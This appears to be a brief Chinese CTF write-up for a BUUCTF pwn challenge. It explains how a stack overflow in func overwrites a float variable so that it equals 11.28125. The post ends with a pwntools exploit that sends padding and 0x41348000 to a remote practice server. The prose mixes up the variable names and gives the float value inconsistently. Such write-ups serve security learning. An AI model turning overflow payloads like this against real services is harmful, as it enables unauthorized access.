分析
使用file命令查看文件信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/725b484e60ea47cd87bc810b7816c681.png)
使用IDA64打开文件
![在这里插入图片描述](https://img-blog.csdnimg.cn/76f7c00a6a434e91a8ba0a494b587345.png)
进入func函数
![在这里插入图片描述](https://img-blog.csdnimg.cn/b15cc66f95aa4236926c78014a784c4e.png)
如果 v2 等于 11.28125
就可以拿到flag
可以看到v1有栈溢出,并且v1在v2的上面,可以通过溢出v2来覆盖v1的值从而获取flag
首先v1是浮点数 11.28125
的二进制是 0x413480
exp
from pwn import *
context.arch = 'amd64'
p = remote('node4.buuoj.cn',26625)
p.sendline(flat([b'a'*(0x30-4) , 0x41348000]))
p.interactive()